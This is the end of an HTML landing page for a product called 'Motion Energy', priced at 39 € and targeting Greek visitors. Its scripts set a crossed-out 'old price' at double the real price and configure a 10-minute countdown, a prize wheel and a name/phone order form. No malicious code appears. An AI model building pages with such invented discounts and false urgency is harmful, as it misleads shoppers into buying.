              fill="rgb(255, 255, 255)" fill-rule="evenodd"></path>
    </symbol>
    <symbol id="toggle">
        <path d="M-0.000,16.999 L-0.000,13.999 L25.000,13.999 L25.000,16.999 L-0.000,16.999 ZM-0.000,6.999 L25.000,6.999 L25.000,9.999 L-0.000,9.999 L-0.000,6.999 ZM-0.000,-0.000 L25.000,-0.000 L25.000,3.000 L-0.000,3.000 L-0.000,-0.000 Z"
              fill="rgb(255, 255, 255)" fill-rule="evenodd"></path>
    </symbol>
    <symbol id="search2">
        <path d="M12.727,12.724 C12.363,13.089 11.774,13.089 11.412,12.724 L8.811,10.124 C7.899,10.773 6.785,11.160 5.580,11.160 C2.498,11.160 -0.002,8.660 -0.002,5.578 C-0.002,2.496 2.498,-0.003 5.580,-0.003 C8.663,-0.003 11.163,2.496 11.163,5.578 C11.163,6.783 10.777,7.897 10.127,8.808 L12.727,11.407 C13.090,11.772 13.090,12.361 12.727,12.724 ZM10.232,5.578 C10.232,3.009 8.150,0.928 5.580,0.928 C3.011,0.928 0.927,3.010 0.927,5.578 C0.927,8.146 3.009,10.228 5.579,10.228 C8.148,10.228 10.232,8.147 10.232,5.578 Z"
              fill="rgb(0, 0, 0)" fill-rule="evenodd"></path>
    </symbol>
    <symbol id="eye">
        <path d="M17.888,5.328 C15.929,8.255 12.598,10.001 8.998,10.001 C5.397,10.001 2.066,8.255 0.107,5.328 C-0.040,5.116 -0.040,4.857 0.107,4.669 C2.066,1.743 5.397,-0.003 8.998,-0.003 C12.598,-0.003 15.929,1.743 17.888,4.669 C18.035,4.881 18.035,5.141 17.888,5.328 ZM8.998,1.224 C5.961,1.224 3.169,2.639 1.405,4.998 C3.169,7.359 5.961,8.774 8.998,8.774 C12.035,8.774 14.827,7.381 16.590,4.998 C14.827,2.639 12.035,1.224 8.998,1.224 ZM8.998,7.807 C7.357,7.807 6.034,6.533 6.034,4.952 C6.034,3.371 7.357,2.097 8.998,2.097 C10.639,2.097 11.961,3.371 11.961,4.927 C11.961,6.509 10.639,7.807 8.998,7.807 ZM9.830,3.181 C9.316,3.181 8.924,3.583 8.924,4.055 C8.924,4.551 9.341,4.927 9.830,4.927 C10.320,4.927 10.712,4.551 10.737,4.055 C10.737,3.559 10.345,3.181 9.830,3.181 Z"
              fill="rgb(164, 164, 165)" fill-rule="evenodd"></path>
    </symbol>
    <symbol id="share">
        <path d="M17.251,0.478 C14.981,0.478 13.128,2.272 13.128,4.470 C13.128,4.885 13.189,5.288 13.312,5.664 L7.587,9.452 C6.862,8.839 5.915,8.463 4.881,8.463 C2.611,8.463 0.757,10.258 0.757,12.456 C0.757,14.654 2.611,16.449 4.881,16.449 C5.914,16.449 6.862,16.072 7.587,15.459 L13.321,19.238 C13.196,19.618 13.128,20.022 13.128,20.442 C13.128,22.640 14.981,24.434 17.251,24.434 C19.521,24.434 21.374,22.640 21.374,20.442 C21.374,18.243 19.521,16.449 17.251,16.449 C15.832,16.449 14.579,17.151 13.836,18.213 L8.360,14.595 C8.768,13.976 9.004,13.242 9.004,12.456 C9.004,11.668 8.760,10.937 8.351,10.317 L13.836,6.698 C14.579,7.761 15.832,8.463 17.251,8.463 C19.521,8.463 21.374,6.669 21.374,4.470 C21.374,2.272 19.521,0.477 17.251,0.477 L17.251,0.478 ZM17.251,1.618 C18.885,1.618 20.196,2.888 20.196,4.470 C20.196,6.052 18.885,7.323 17.251,7.323 C15.617,7.323 14.306,6.052 14.306,4.470 C14.306,2.888 15.617,1.618 17.251,1.618 ZM4.881,9.604 C6.514,9.604 7.826,10.874 7.826,12.456 C7.826,14.037 6.514,15.308 4.881,15.308 C3.247,15.308 1.936,14.037 1.936,12.456 C1.936,10.874 3.247,9.604 4.881,9.604 ZM17.251,17.589 C18.885,17.589 20.196,18.860 20.196,20.442 C20.196,22.023 18.885,23.294 17.251,23.294 C15.617,23.294 14.306,22.023 14.306,20.442 C14.306,18.860 15.617,17.589 17.251,17.589 Z"
              fill="rgb(53, 53, 53)" fill-rule="evenodd"></path>
    </symbol>
</svg>
<script>
    var $nav, $h = 0;

        $nav = $(".bnr-block");
        $h = $nav.offset().top;
        $(window).scroll(function () {
            if ($(window).scrollTop() > $h) {
                $nav.addClass("fix");
            } else {
                $nav.removeClass("fix");
            }
        });

</script>

<div class="ac_footer"><a href="http://ac-feedback.com/report_form/"> Report </a>

</div>

<script>
    const offer_params = {
        priceMain : '39',
        customPriceOld: '',//вказуєм свою стару ціну якщо не підходить звичайна ціна *2
        currencyMain: '€',
        productName : 'Motion Energy',
    };


    var productName = document.getElementsByClassName("productName");
    var priceMain = document.getElementsByClassName("priceMain");
    var priceOld = document.getElementsByClassName("priceOld");
    var currencyMain = document.getElementsByClassName("currencyMain");


    for (var i = 0; i < productName.length; i++) {
        productName[i].innerHTML = offer_params.productName;
    }
    for (var i = 0; i < priceMain.length; i++) {
        priceMain[i].innerHTML = offer_params.priceMain;
    }


    if(offer_params.customPriceOld){
        for (var i = 0; i < priceOld.length; i++) {
            priceOld[i].innerHTML = offer_params.customPriceOld;
        }
    }else{
        for (var i = 0; i < priceOld.length; i++) {
            priceOld[i].innerHTML = offer_params.priceMain * 2;
        }
    }


    for (var i = 0; i < currencyMain.length; i++) {
        currencyMain[i].innerHTML = offer_params.currencyMain;
    }
</script>


<script>
    var usr = '{t2}';
    var sabss = '{clickid}';
    initFeatures({
        priceMain : offer_params.priceMain,
        currencyMain : offer_params.currencyMain,
        lang : 'gr', // список языков - vn, it, es, co, hr, en, de, fr, ph, cz, id, th, gr, bg, al, ro, sg, en_sg, mk, si, sk, lv, hu, pl, lt, pt
        product : offer_params.productName, // название продукта
        genderTargetting : 'all', // пол целевой аудитории - all, male, female
        form : {
            isNeeded : 1, // 1-включить форму, 0-выключить
            img: 'prod.png', // путь до картинки продукта
            price: true, // плашка с ценой
            priceBrFix: true, // фиксит отображение цен в ценике (true - уберает перенос строки)
            showSelect: false, // показывать или скрывать поле select
            untilExpire: 600 // таймер окончания акции где 600 = 10мин. Ставим 0 если таймер не нужен.
        },
        autoComments: {
            isNeeded: 0, // 1-включить автокомы, 0-выключить
            bgColor: '#d7f2d8' // цвет фона блока комчиков
        },
        popups: {
            isNeeded: 0, // 1-включить попы, 0-выключить
            bgColor: 'rgba(87, 86, 141, 0.8)', // цвет фона сообщения
            textColor: '#fff', // цвет основного текста сообщения
            emphColor: 'cyan', // цвет выделений в сообщениях (например, 'со скидкой XX%', '' )
            blackIcons: false // черные или белые иконки, значения true или false
        },
        wheel: {
            isNeeded: 1, // 1-включить колесо, 0-выключить
            customWheel: false // ссылка на свое колесо, либо false
        }
    });
</script>
<script>
    $('[name="name"]').on('input change', function () {
        var val = $(this).val();
        $(this).val(val.replace(/[0-9+]/g, ''));
    });
    $('[name="name"]').attr('autocomplete', 'name');
    $('[name="name"]').attr('pattern', '.{2,25}');
    $('[name="phone"]').on('input change', function (e) {
        var val = $(this).val();
        $(this).val(val.replace(/[A-zА-яіїЁё ]/g, ''));
    });
    $('[name="phone"]').get(0).type = 'tel';
    $('[name="phone"]').attr('autocomplete', 'tel');
    $('[name="phone"]').attr('pattern', '.{6,18}')
</script>
</body>
</html>